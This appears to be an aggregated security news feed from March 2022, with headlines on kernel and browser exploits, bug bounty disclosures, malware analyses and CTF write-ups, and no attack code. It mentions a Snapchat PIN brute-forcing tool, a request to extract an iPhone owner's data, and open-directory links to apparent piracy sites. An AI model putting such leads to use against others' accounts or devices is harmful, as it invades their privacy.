    Article URL: https://www.ipcc.ch/report/ar6/wg2/downloads/report/IPCC_AR6_WGII_SummaryForPolicymakers.pdf Comments URL: https://news.ycombinator.com/item?id=30834777 Points: 2 # Comments: 0
    Critical Sophos Firewall vulnerability allows remote code execution
    Article URL: https://www.bleepingcomputer.com/news/security/critical-sophos-firewall-vulnerability-allows-remote-code-execution/ Comments URL: https://news.ycombinator.com/item?id=30830479 Points: 2 # Comments: 0
  • Open

    Popcap + GameHouse games installers
    https://drive.google.com/drive/folders/1_3uk_FxyOfxJhmi79vHkseyrwhl5NaQj?fbclid=IwAR3XO8GsSlrK-ii_hgKiYPnbIUkhb5p97xraZ-lATGa9zYDn8HWdqw8lubc submitted by /u/baconpancakesboii [link] [comments]
    Large archive
    http://136.35.236.43/shared/ submitted by /u/ilikemacsalot [link] [comments]
    LLOD 03-27-22 (Large List Of Open Directories)
    http://techmedic.us/d/ http://sdfox7.com/win95/ http://sdfox7.com/netscape/ http://sdfox7.com/macppc/ https://mactorrents.io/wp-content/uploads/ http://51.15.171.201/141/ http://www.mac-torrent-download.net/wp-content/uploads/ http://www.vfxhq.com/overflow/macaddict/ http://www.newlaunches.com/entry_images/ https://download.panic.com/ http://hl.udogs.net/files/ https://mc68000.org/downloads/ https://defhoboz.biz/ http://freeware.epsc.wustl.edu/ http://www.sfu.ca/person/dearmond/322/ http://ccp14.cryst.bbk.ac.uk/ccp/ http://gentoo.mirror.beocat.ksu.edu/portage/app-arch/stuffit/ http://ftpmirror.your.org/ https://soft.uclv.edu.cu/isos/MacOS/MAC%20Leopard/Utiles/ http://baby.indstate.edu/msattler/ https://www.w3.org/History/ https://ftp.swin.edu.au/ https://www.ifarchive.org/if-archive/ http://wreckcenter.com/68k/ ​ ​ ​ Extra random image: http://www.newlaunches.com/entry_images/260805/battery.bmp submitted by /u/ilikemacsalot [link] [comments]
  • Open

    CVE-2022-0995 exploit - heap out-of-bounds write in the watch_queue Linux kernel component
    submitted by /u/0xdea [link] [comments]
    CVE-2022-27666: Exploit esp6 modules in Linux kernel
    submitted by /u/0xdea [link] [comments]
    LDAP relays for initial foothold in dire situations
    submitted by /u/AlmondOffSec [link] [comments]
    New Suncrypt ransomware discovered with added capabilities
    submitted by /u/woja111 [link] [comments]
    OPNSense Firewall Bypass with Carp
    submitted by /u/oherrala [link] [comments]
    Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability. CVE-2022-1096 is the second zero-day vulnerability addressed by Google in Chrome since the start of the year.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Courtesy of Republic of Bulgaria! - Part Four
    For you there's no such thing as a link you can click on? Guess what? I won't tell you. Guess what again? The word is this - a basic link which you're forbidden from clicking on it. It's called the "The Twilight Zone". Good luck in living there and don't forget to spend the rest of your time watching the Outer Limits. You wish!Related posts:Courtesy of Republic of Bulgaria! - Part ThreeCourtesy
  • Open

    SecWiki News 2022-03-28 Review
    OpenCTI入门笔记(二):存储设置&清理&修改图标和title by ourren CodeCat:一款功能强大的静态代码分析工具 by ourren 攻防对抗模拟工具CyberBattleSim的简单分析 by ourren 如何学习这么多的安全文章(理论篇) by ourren 护网相关知识整理 by ourren 数字货币在暗网中的使用初探 by ourren eCapture:无需CA证书抓https网络明文通讯 by ourren 俄乌网络战争的启示 by ourren 我们能从日本保障东京奥运会网络安全工作中学到什么? by Avenger SecWiki周刊(第421期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-28 Review
    OpenCTI入门笔记(二):存储设置&清理&修改图标和title by ourren CodeCat:一款功能强大的静态代码分析工具 by ourren 攻防对抗模拟工具CyberBattleSim的简单分析 by ourren 如何学习这么多的安全文章(理论篇) by ourren 护网相关知识整理 by ourren 数字货币在暗网中的使用初探 by ourren eCapture:无需CA证书抓https网络明文通讯 by ourren 俄乌网络战争的启示 by ourren 我们能从日本保障东京奥运会网络安全工作中学到什么? by Avenger SecWiki周刊(第421期) by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 |英国内勒索攻击2021年内激增100%;美国欧盟同意重开跨大西洋数据流动
    根据一项最新分析,在2020年至2021年疫情期间,向英国数据保护监管机构报告的勒索软件攻击数量增加了一倍多。
    Anonymous泄露从俄罗斯央行窃取的28GB数据
    日前,Anonymous组织已通过其推特账号(@Thblckrbbtworld)向外披露了28GB被盗的数据。
    美国FCC将卡巴斯基、中国电信和中国移动加入国家安全威胁名单
    卡巴斯基和中国驻华盛顿大使馆均已对此做出了回应。
    Chrome 最新零日漏洞已得到修复
    Chrome 浏览器紧急更新,修复了一个零日漏洞。
    Sophos防火墙受到一个严重的身份验证绕过漏洞影响
    近期,Sophos修复了位于Sophos防火墙的用户门户和Webadmin区域的身份验证绕过漏洞,该漏洞被标记为CVE-2022-1040。CVE-2022-1040漏洞的CVSS得分为9.8,它影响了Sophos Firewall版本18.5 MR3 (18.5.3)及更早版本。在Sophos近期更新的一则公告中,称Sophos防火墙在用户门户和Webadmin中发现了该允许远程执行代码的身份验
  • Open

    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    网络空间视角下的哈萨克斯坦动乱
    作者:知道创宇404实验室 原文下载:知道创宇404实验室网络空间视角下的哈萨克斯坦动乱.pdf 一、背景介绍 2022年伊始,哈萨克斯坦西部石油重镇扎瑙津爆发抗议活动,随后迅速蔓延到包括阿拉木图在内的其他城市。抗议从抵制液化石油气价格飙升逐渐发展为暴力骚乱。部分示威者甚至闯进前首都阿拉木图政府,阿拉木图市政府和检察院遭纵火。但随着集体安全条约组织成员国向哈萨克斯坦派遣军队提供援助,哈萨克斯...
    Linux_Kernel 保护机制绕过
    作者:时钟@RainSec 原文链接:https://mp.weixin.qq.com/s/gSTbXW6M72QYtVPoZswhyw 前言 好久没搞kernel的洞了,最近分析的这方面的洞有点多,相关的Exp任务也比较多,因此学习总结一下方便查找和记忆。 SMEP + KPTI bypass SMEP是SupervisorModeExecutionPrevention的缩写,主要的作用其...
    Go-fuzz 解析和思考
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org go-fuzz Go-fuzz的原理很多都是基于AFL,这里只分析了一些它独特的地方,收获很多,也希望可以和大家交流,如有分析错误还望交流指正。 go-fuzz是google开源的一款go语言fuzz框架,它和AFL很大的一个不同是在于,...
    Arkei 变种:从 Vidar 到 Mars Stealer
    译者:知道创宇404实验室翻译组 原文链接:https://isc.sans.edu/diary/rss/28468 引入 2018年的某个时候,一个名叫 Vidar 的信息窃取软件出现了。分析显示 Vidar 是Arkei 恶意软件的翻版 。从那时起,Vidar 也启发了其他基于 arkei 的变种。今天的文章回顾了 Vidar 和另外两个变种: Oski Stealer 和 Mars S...
  • Open

    网络空间视角下的哈萨克斯坦动乱
    作者:知道创宇404实验室 原文下载:知道创宇404实验室网络空间视角下的哈萨克斯坦动乱.pdf 一、背景介绍 2022年伊始,哈萨克斯坦西部石油重镇扎瑙津爆发抗议活动,随后迅速蔓延到包括阿拉木图在内的其他城市。抗议从抵制液化石油气价格飙升逐渐发展为暴力骚乱。部分示威者甚至闯进前首都阿拉木图政府,阿拉木图市政府和检察院遭纵火。但随着集体安全条约组织成员国向哈萨克斯坦派遣军队提供援助,哈萨克斯...
    Linux_Kernel 保护机制绕过
    作者:时钟@RainSec 原文链接:https://mp.weixin.qq.com/s/gSTbXW6M72QYtVPoZswhyw 前言 好久没搞kernel的洞了,最近分析的这方面的洞有点多,相关的Exp任务也比较多,因此学习总结一下方便查找和记忆。 SMEP + KPTI bypass SMEP是SupervisorModeExecutionPrevention的缩写,主要的作用其...
    Go-fuzz 解析和思考
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org go-fuzz Go-fuzz的原理很多都是基于AFL,这里只分析了一些它独特的地方,收获很多,也希望可以和大家交流,如有分析错误还望交流指正。 go-fuzz是google开源的一款go语言fuzz框架,它和AFL很大的一个不同是在于,...
    Arkei 变种:从 Vidar 到 Mars Stealer
    译者:知道创宇404实验室翻译组 原文链接:https://isc.sans.edu/diary/rss/28468 引入 2018年的某个时候,一个名叫 Vidar 的信息窃取软件出现了。分析显示 Vidar 是Arkei 恶意软件的翻版 。从那时起,Vidar 也启发了其他基于 arkei 的变种。今天的文章回顾了 Vidar 和另外两个变种: Oski Stealer 和 Mars S...
  • Open

    Intigriti’s March XSS Challenge By BrunoModificato
    This month’s challenge was a bit tricky, but still fun nonetheless. The main goal is to bypass CSP protection in a way that is not… Continue reading on Medium »
  • Open

    Sans Sift vs CSI Linux
    Hi Team, I just have a quick question from you. In your opinion, what are the similarities and differences of sans sift workstation and CSI Linux submitted by /u/bankshot15 [link] [comments]

  • Open

    SELECTING OSINT SERVICES FROM CYBER GRANDFATHER!
    https://t.me/BrainHaking2_0ENG/53 Continue reading on Medium »
    Ukraine — Point de situation au 28 mars
    Les dernières 24h Continue reading on Medium »
    SPY NEWS: 2022 — Week 12
    Summary of the espionage-related news stories for the Week 12 (20–26 March) of 2022. Continue reading on Medium »
  • Open

    meobrute - Automate the process of brute forcing the My Eyes Only pin code on Snapchat
    submitted by /u/rushedcar [link] [comments]
    Pulling user data from Iphone data
    Device Iphone 5c Build 13e237 I have scraped the serial and IMEI and I have the device name however with a barebones phone without any apps having been used is there a location to pull the owners registered information without access to the Sim? submitted by /u/CoreRun [link] [comments]
  • Open

    Able to steal bearer token from deep link
    Basecamp disclosed a bug submitted by danielllewellyn: https://hackerone.com/reports/1372667 - Bounty: $6337
  • Open

    Have there ever been audits of Google Authenticator to confirm that Google cannot read your 2FA codes?
    Google's entire business model revolves around collecting user data and has a confirmed history of working with authorities to monitor individuals in the US and abroad. Google Authenticator app is also the most popular 2FA that exists presently. Has anyone in the NetSec community confirmed that Google does not collect 2FA information from the app and store the seed needed to generate codes on its servers? submitted by /u/JamieOvechkin [link] [comments]
    questions from WAHH?
    There are some lab URLs mentioned in the book http://mdsec/xyz/1837 like this....but these are not live.. My question is has anyone solved those in the past and how are the labs on the portswigger academy as compared to those? submitted by /u/Dry-Brilliant3087 [link] [comments]
    Virtual Machines
    Are the abilities of a computer being used in a botnet, bottlenecked in any when being ran through a VM? submitted by /u/satellitesatan [link] [comments]
  • Open

    Solution to my $20 egg hunt (Part 3)
    My latest article gave a significant hint towards solving the $20 challenge. This one will help you a few steps further… Continue reading on Medium »
  • Open

    Lateral Movement: Remote Services (Mitre:T1021)
    Introduction During Red Team assessments, after a compromise has been done, attackers tend to laterally move through the network gaining more relevant information on other The post Lateral Movement: Remote Services (Mitre:T1021) appeared first on Hacking Articles.
  • Open

    Lateral Movement: Remote Services (Mitre:T1021)
    Introduction During Red Team assessments, after a compromise has been done, attackers tend to laterally move through the network gaining more relevant information on other The post Lateral Movement: Remote Services (Mitre:T1021) appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-03-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Scheduled Tasks and Batteries
    Krzysztof shared another blog post recently, this one that addresses the battery use and the battery level of a system, and how it applies to an investigation. At first thought, I'm sure a lot of you are asking, "wait...what?", but think about it for a moment. Given the pandemic, a lot of folks are working remote...a LOT. There are a number of firms that are international, with offices in a lot of different countries all over the world, and a great many of those folks are working remotely. Yes, we've always had remote workers and folks working outside of office environments, but the past 2+ years have seen something of a forced explosion in remote workers. Those remote workers are using laptops. And it's likely that they're not always connected to a power supply; that is, there will be tim…
  • Open

    FreeBuf早报 | 雀巢称数据系自己泄露非匿名者窃取;美将中国电信等列入安全威胁名单
    当地时间 3 月 25 日,美国联邦通信委员会 FCC 将中国电信(美洲)公司、中国移动(美国)、卡巴斯基等公司加入了对美国国家安全构成威胁的通信设备和服务提供商名单。
  • Open

    Introduction to CSRF: How can a cookie get you hacked
    submitted by /u/gooldopt [link] [comments]
  • Open

    flying spaghetti monster
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Since they'll be in the news following Taylor Hawkins death.
    https://www.ashleecadell.com/xyzstorelibrary/Foo%20Fighters/ yes - I am aware the parent directory has been posted recently. http://pitofdespair.randominsanity.org/music/Luna/Foo%20Fighters/ http://109.120.203.163/Music/grunge/Foo%20Fighters/ ditto for this one submitted by /u/ringofyre [link] [comments]
  • Open

    Real talk
    submitted by /u/DrinkMoreCodeMore [link] [comments]

  • Open

    oss-security - Re: zlib memory corruption on deflate (i.e. compress)
    submitted by /u/Gallus [link] [comments]
    PHP filter_var shenanigans
    submitted by /u/Gallus [link] [comments]
    Mining data from Cobalt Strike beacons
    submitted by /u/digicat [link] [comments]
    Using the Dirty Pipe Vulnerability to Break Out from Containers
    submitted by /u/freakwin [link] [comments]
  • Open

    Ukraine — Point de situation au 26 mars
    Les dernières 24h Continue reading on Medium »
    Ukraine — Point de situation au 26 mars
    Les dernières 24h Continue reading on Medium »
  • Open

    CVE-2022-1096: Type Confusion in V8, exploit exists in the wild
    Article URL: https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html Comments URL: https://news.ycombinator.com/item?id=30814231 Points: 2 # Comments: 0
    Chrome 0day is being exploited now for CVE-2022-1096; update immediately
    Article URL: https://www.forbes.com/sites/daveywinder/2022/03/26/google-confirms-emergency-security-update-for-32-billion-chrome-users-attacks-underway/ Comments URL: https://news.ycombinator.com/item?id=30813779 Points: 257 # Comments: 141
  • Open

    【安全通报】Spring Cloud Function SPEL 远程命令执行漏洞
    近日,Spring Cloud Function 官方测试用例曝光了 Spring Cloud Function SPEL表达式注入漏洞,该漏洞可通过对 SPEL表达式进行注入从而引发远程命令执行。
  • Open

    【安全通报】Spring Cloud Function SPEL 远程命令执行漏洞
    近日,Spring Cloud Function 官方测试用例曝光了 Spring Cloud Function SPEL表达式注入漏洞,该漏洞可通过对 SPEL表达式进行注入从而引发远程命令执行。
  • Open

    OTP reflecting in response sensitive data exposure leads to account take over
    UPchieve disclosed a bug submitted by rupachandransangothi: https://hackerone.com/reports/1318087
    No Rate Limit on forgot password page
    UPchieve disclosed a bug submitted by pranto_0: https://hackerone.com/reports/1317494
    Password reset token leakage
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354437
    Missing Validation in editing "Your Phone Number"
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354368
    Password Reuse
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354382
    Outdated Copyright Message @ Welcome email
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354444
    No rate Limit on Password Reset page on upchieve
    UPchieve disclosed a bug submitted by rupachandransangothi: https://hackerone.com/reports/1320138
    Clickjacking login page of https://hackers.upchieve.org/login
    UPchieve disclosed a bug submitted by sara346: https://hackerone.com/reports/1331485
    No Rate Limiting for Password Reset Email Leads to Email Flooding
    UPchieve disclosed a bug submitted by bd10ceb041a5297f881137c: https://hackerone.com/reports/1340650
  • Open

    Using the Dirty Pipe Vulnerability to Break Out from Containers
    Article URL: https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/ Comments URL: https://news.ycombinator.com/item?id=30813614 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-03-26 Review
    利用开源情报发现并解释恶意行为 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-26 Review
    利用开源情报发现并解释恶意行为 by ourren 更多最新文章,请访问SecWiki
  • Open

    漏洞情报 | Spring Cloud Function SPEL表达式注入漏洞通报
    近日,Spring Cloud Function官方测试版本通报了一个有关Spring Cloud Function SPEL表达式注入漏洞。利用该漏洞,不法分子可通过特殊配置SPEL表达式注入的方式在远程执行注入攻击。鉴于Spring Cloud Function相关组件应用范围有限,另外该漏洞我无法在默认配置情况下出发,因此实际危害不会太高。FreeBuf将该漏洞等级评委「中危」。漏洞描述:S
  • Open

    Stuxnet worm | The world's first digital weapon
    submitted by /u/OkFaithlessness2414 [link] [comments]
  • Open

    pictures from a monster raving loony candidate
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    ToolsRus CTF — Writeup
    In this CTF we have multiple tools we’ll use to enumerate, exploit to gain access and then catch a shell to capture the flag. Continue reading on Medium »
    Cybersecurity Adventure
    This blog will be a way for me to share with you my journey through cybersecurity. I will do this by creating walkthroughs ranging from… Continue reading on Medium »
  • Open

    Reverse Engineering Fortinet Fortigate Devices
    I want to view the traffic between a FortiGate device and the Fortinet APIs (where fortinet gets updates, threat intelligence, etc). Ive got a VM of FortiGate and I've got it proxying traffic via Burpsuite. I'm fairly sure that the FortiGate device has SSL pinning enabled, because despite adding my CA cert, I still can't see the traffic. Questions, how would I gain root on this device? Secondly, how would I remove the SSL Pinning or replace the cert? submitted by /u/danchuckaway27 [link] [comments]
    Recommendation
    Currently my supervisor ask me to check Acunetix and Qualys (I dont use this before), any recommendation why I will recommend acunetix over qualys and vice versa? Thank you I prefer the Acunetix because the company is using PHP, the interface of Acunetix and the ease of use of it. submitted by /u/pldc_bulok [link] [comments]
    Malicious email tools in O365
    Can someone point me to the best education/information on how to properly use all tools available for security around O365 email? submitted by /u/rogueit [link] [comments]
    Outlook gives "site security cert invalid" message, further viewing shows weirdness?
    Hi all, I use Office365, and have Outlook installed on my W10 machine. Have operated this way for years. I am have some basic infosec knowledge, at least to the point where I know what to avoid and what steps to take to keep myself somewhat secure. From time to time a message pops up in Outlook telling me that a site security cert has a problem. Normally I just ignore it, but today decided to look into it further. When I view the certificate details, the thing that popped out to me was a Huawei email address. Screenshots Now I think I'm just being curious/paranoid, but figured I'd ask cause at the least I'd get a better understanding of what's happening. Am I right in thinking that this relates to a particular email message containing content that's hosted somewhere and that's what Outlook is hesitant to access? Or does this relate to something else? Rather than this being the CCP having broken into my house, installed a custom CPU containing embedded backdoor access into my decade old gaming rig, I would think that this then probably relates more to major back-end backbone infrastructure stuff, which Huawei does a lot of, so is probably more along those lines? Any info appreciated. p.s. don't need to be told to use different email/PC/internet/security/OS, but I understand it's a natural reflex many of you can't control :D submitted by /u/JForce1 [link] [comments]

  • Open

    Enhance Network security skills advice ?
    Hello , i am currently a rising senior going to graduate with Management of info. Systems B.S. and iam very interested in cybersecurity. I’ve been studying for S+ & N+ and that has helped my cyber knowledge tremendously. I was wondering how can enhance my skills? I want to join a red team for a big company. Any tips on how to perform penetration tests? How to perform network scans? And how to look for vulnerabilities? What software do i need ? Ive been trying to use kali linux but its so hard to download on mac . Any tips ? Ik most of the basic cybersecurity knowledge, i just want to apply it and practice! submitted by /u/AffectionateDot4877 [link] [comments]
    Tests to run on a raspberry på lora protocol
    Hi, I have a very general inspiration problem. I'm currently doing my msc thesís. We are implementing a protocol (kinda like the signal one) for lora networks. We have the protocol implemented in rust, and the plan was to put in onto a constrained device that we had found, and then measure the power consumption of the protocol. We have run into a roadblock though, the devices we had in mind are incompatible with the lora resource we have at hand. SO now, we're putting the project on a raspberry pi instead. This kinda ruins the whole idea with reading the power usage of the device, since the raspberry pi consumes so much power, that power readings won't really make much sense. ​ So what I want to ask the creatives minds of asknetsec, is if anyone can think of any measurements, or interesting academic experiments that one could do with the raspberry pi? checking security properties in some way or something? or is there a cool way of measuring power on a raspberry pi, that can abstract away some of the operations that the pi does usually? submitted by /u/GarseBo [link] [comments]
    OWASP ZAP with google authentication?
    Can I run OWASP ZAP on a webapp that uses google authentication? or provide it a cookie from a browser that is already authenticated to said app? I can't find anything about google authentication in the documentation. submitted by /u/Individual-Quarter47 [link] [comments]
    Looking for insight/experience on PAM solutions from an offensive perspective
    Hello, As the title says, I'm trying to gather some insight to PAMs (such as Thycotic and CyberArk) from the perspective of red teamers/pentesters. Google hasn't turned up much in the way of blogs or writeups. Our company is in talks with a vendor to implement this type of software, and I'm not seeing eye-to-eye with the reps. They claim it will mitigate most common AD attacks against privileged accounts, but I'm struggling to see how exactly it will mitigate attacks such as PtH and forging tickets. Understandably, it will make it harder to capture a hash and cut down on persistence if the passwords are regularly rotated, but it certainly doesn't make it impossible (or even improbable) to execute these traditional attacks. So, if anyone has any first hand experience or a link to a good blog/writeup, I would be very appreciative. In addition, with consideration to what I've asked, I also welcome your opinion on 'is it worth it'. Thank you in advance. submitted by /u/GrandWheel50 [link] [comments]
    education pathing advice
    I just completed my bachelor's with a concentration in cybersecurity. My current company reorganized, I got rehired, but am not where I'd like to be. While exploring entry level infosec jobs during reorg (internal and external), most roles wanted either more experience or more certs. (I have IT support, analyst, and leadership experience - no SOC or security or compliance analyst roles). I currently only have CompTIA A+, Net+, Sec+. My current employer offers tuition assistance 8k/year with no degree cap. Does it make sense to get a masters from WGU with two EC council certifications (approximately 2 years on tuition assistance, and potentially finishing early with scholarship opportunities) OR a bachelor's of applied cybersecurity from SANS institute with 9 GIAC certs and an internship at the internet storm center (approximately 4 years with tuition assistance/no loans) loans/extra financial responsibility needs to be avoided as I'm a single parent about to need to help my child with college in 2 years which is a big determining factor in speed of completion due to funding. submitted by /u/GestahlianSociety [link] [comments]
    Submitted a bug/vulnerability/exploit to Apple but they wont Pay me ?
    More like a exploit / vulnerability that gains full disk access to the System if you have physical access to the machine...This is working on the latest Monterey OS, all i got from Apple was a thank you for working with our team and no reward, after submitting alot of information,files,and videos etc demonstrating how it works.??? anyone else had this happen ??????? i feel like i got robbed. and the worst thing about it is, i could've sold the exploit to another bugBounty website..... the website states $ 100,000-$200,000 for this type of exploit.... https://developer.apple.com/security-bounty/ submitted by /u/0sculum3stm0rtis [link] [comments]
  • Open

    How to detect IMSI catchers
    submitted by /u/knoy [link] [comments]
    Detect malicious activity in Okta logs with Falco and Sysdig okta-analyzer
    submitted by /u/MiguelHzBz [link] [comments]
    RTLO Injection URI Spoofing CVE-2020-20093; 20094; 20095; 20096... chilling in plain sight for 3 years 👀 — iMessage, WhatsApp, Instagram, and Facebook Messenger. Telegram patched earlier & Signal fixing today!
    submitted by /u/docker-osx [link] [comments]
    Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)
    submitted by /u/stypr [link] [comments]
    Red Canary's 2022 Threat Detection Report
    submitted by /u/tvjust [link] [comments]
    Splunk Patches Indexer Vulnerability Discovered By Team82
    submitted by /u/n0llbyte [link] [comments]
    What to look for when reviewing a company's infrastructure
    submitted by /u/okram87 [link] [comments]
    Video - SSH Phishing attack on FIDO protected ssh keys
    submitted by /u/ssh-mitm [link] [comments]
    Heap Overflow in OpenBSD's slaacd via Router Advertisement
    submitted by /u/Gallus [link] [comments]
  • Open

    Found a useful Tools and Programs list for Digital Forensics
    submitted by /u/Khaotic_Kernel [link] [comments]
  • Open

    The Mystery Admin User
    One of our clients recently submitted a malware removal request with a curious problem: A mystery admin user kept getting re-created on their website. Try as they might, nothing they did would get rid of this user; it just kept coming back. A suspicious “user” that just won’t go away… It was suspiciously generic, named simply “user” and had no name, content, or email attached to it. Continue reading The Mystery Admin User at Sucuri Blog.
  • Open

    Hacking Wordpress, DC 6 from Vulnhub
    https://youtu.be/aJ52gTHzzKQ submitted by /u/luzunov [link] [comments]
  • Open

    Dual North Korean hacking efforts found attacking Google Chrome vulnerability
    Article URL: https://www.cyberscoop.com/north-korea-hackers-google-dream-job/ Comments URL: https://news.ycombinator.com/item?id=30805937 Points: 2 # Comments: 0
    Vulnerability in Honda's Remote Keyless System
    Article URL: https://github.com/nonamecoder/CVE-2022-27254 Comments URL: https://news.ycombinator.com/item?id=30804702 Points: 428 # Comments: 189
  • Open

    SecWiki News 2022-03-25 Review
    全球高级持续性威胁(APT)2021年度报告 by ourren Lapsus$组织攻击微软的手法以及几点启示 by ourren 预测功能性漏洞利用 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-25 Review
    全球高级持续性威胁(APT)2021年度报告 by ourren Lapsus$组织攻击微软的手法以及几点启示 by ourren 预测功能性漏洞利用 by ourren 更多最新文章,请访问SecWiki
  • Open

    Misconfigured Rate Limit at app.sign.plus/forgot_password
    Alohi disclosed a bug submitted by shamim_12__: https://hackerone.com/reports/1472394
    F5 BIG-IP TMUI RCE - CVE-2020-5902 (.packet8.net)
    8x8 disclosed a bug submitted by remonsec: https://hackerone.com/reports/1519841
    Business Logic Flaw in the subscription of the app
    Dragon disclosed a bug submitted by engr-naseem1: https://hackerone.com/reports/1505189 - Bounty: $250
    Broken link hijacking in https://kubernetes-csi.github.io/docs/drivers.html?highlight=chubaofs#production-drivers
    Kubernetes disclosed a bug submitted by 0xlegendkiller: https://hackerone.com/reports/1466889 - Bounty: $100
  • Open

    About
    Hi! I’m hahwul. I like doing various things about hacking, security and all the technique of computer science. “hahwul” is a new word made by remixing my name, and it means me. pronunciation is a little vague. say ‘ha-hul’ but you can just call me ‘howl’ If you have any other questions please feel free to contact me (@hahwul). 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 package main type Me struct { Job string Pronouns string SpecialMove string MainWeapon string Language []string } func main() { me := &Me{ Job: "🗡 Security engineer and Red team that aims for a purple team.
    Security Crawl Maze와 ZAP
    이번달 초 쯤이였나요? ZAP의 메인 개발자인 Simon이 이런 트윗을 남겼었습니다. Anyone able to recommend any open source tools that are good at crawling modern web apps? Out of the box rather than toolkits. Apart from @zaproxy I’m looking for comparisons 😁 제가 아는 선에선 ZAP과 Burpsuite의 Spider/Crawler가 가장 좋다고 느꼈기 때문에 ZAP과 Burpsuite를 이야기 했었는데요. 문뜩 이 때 ZAP이 Spidering을 개선할 것 같은 느낌이 들었었습니다. 시간이 좀 지난 후 ZAP은 StackHawk ZAP Fund를 통해 오래된 버그들에 대한 버그바운티(우리가 아는 버그바운티랑 약간 달라요.
  • Open

    CTF Writeup: VishwaCTF 2022
    This is my writeup for the VishwaCTF 2022, which includes OSINT, Misc, Forensics, Cryptography challenges. Continue reading on Medium »
    L’espion Walkthrough — Cyberdefenders
    Challenge Link: L’espion Continue reading on Medium »
    Ukraine — Point de situation au 25 mars
    Les dernières 24h Continue reading on Medium »
    OSINT TOOLS
    WHAT TOOLS DO YOU NEED TO KNOW? Continue reading on Medium »
  • Open

    Plenty of learning material for technicians
    https://edu.anarcho-copy.org/ submitted by /u/Appropriate-You-6065 [link] [comments]
  • Open

    How Token Misconfiguration can lead to takeover account
    this has been moved to Continue reading on Medium »
    Solution to my $20 egg hunt (Part 2)
    This is part 2 of my tutorial on how to solve my $20 egg hunt. This post should help you towards the end of this challenge… Continue reading on Medium »
  • Open

    hackmyvm系列1——hotle
    本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
    《网络安全审查办法》演绎版 (第二期)
    《网络安全审查办法》生动演绎版,快来学习吧。
    《网络安全审查办法》演绎版 (第一期)
    《网络安全审查办法》演绎版 ,快来学习吧。
    美国指控 4 名俄罗斯政府雇员从事黑客活动
    美国政府指控四名俄罗斯政府雇员,参与对全球能源领域数百家公司和组织的网络攻击活动。
    来检测带外(Out-of-Band)流量的Ceye
    Goby 基于 FOFA 平台丰富的指纹库基础上,可以快速高效对目标网络环境进行资产探测。
    FBI:2021年网络犯罪带来的损失高达69亿美元
    和2020年相比,2021年不论是报告的数量还是损失的金额都有明显地增加,其中金额增加了20多亿美元,接近二分之一,令人感到无比惊讶。
    FreeBuf周报 | Lapsus$勒索组织入侵微软源代码存储库;黑客使用新的 Rootkit 攻击银行ATM
    3月21日晚,Lapsus$ 公开了从微软 Azure DevOps 服务器窃取的 37GB 源代码,这些源代码适用于各种内部 Microsoft 项目,包括 Bing、Cortana 和 Bing 地图。
    FreeBuf甲方群话题讨论 | 公有云、私有云还是混合云?聊聊企业云端化安全建设
    近年来,企业上云似乎成为必然趋势,但企业该如何科学、高效上云,如何选择云端化产品,成为企业数字化发展中不得不面临的问题。
    Java RMI漏洞利用技术浅析
    RMI是由JDK自带提供的一套远程方法调用框架,用于实现跨JVM间的方法调用。
    Anonymous声称已入侵俄罗斯央行
    国际知名黑客组织“匿名者”(Anonymous)日前他们声称已经侵入了俄罗斯中央银行。
    “盘一盘”近期疯狂作案的 Lapsus $ 黑客组织
    “长江后浪推前浪,一代更比一代强”,嚣张的黑客组织 Lapsus $。
    伦敦警方逮捕7名Lapsus$ 团伙嫌疑人,16岁少年被怀疑是头目之一
    这7名嫌疑人年龄从16-21岁不等,目前警方已将其释放,但调查工作仍在继续。
  • Open

    基于 OpenAFS 文件系统的反射攻击深度分析
    作者:百度安全实验室 原文链接:https://mp.weixin.qq.com/s/CIAdpOoxQ-ARwitVmTxX7Q 0x00概述 百度智云盾团队在2022年3月首次捕获到利用OpenAFS服务的反射放大攻击。据现有资料表明,这种反射攻击方式尚属全网首次出现,智云盾系统在2秒内识别攻击,实时对流量做了隔离和清洗,保障用户免遭DDoS的伤害。 经过深入分析,我们确认了本次攻击是黑...
  • Open

    基于 OpenAFS 文件系统的反射攻击深度分析
    作者:百度安全实验室 原文链接:https://mp.weixin.qq.com/s/CIAdpOoxQ-ARwitVmTxX7Q 0x00概述 百度智云盾团队在2022年3月首次捕获到利用OpenAFS服务的反射放大攻击。据现有资料表明,这种反射攻击方式尚属全网首次出现,智云盾系统在2秒内识别攻击,实时对流量做了隔离和清洗,保障用户免遭DDoS的伤害。 经过深入分析,我们确认了本次攻击是黑...
  • Open

    Need help with hydra syntax
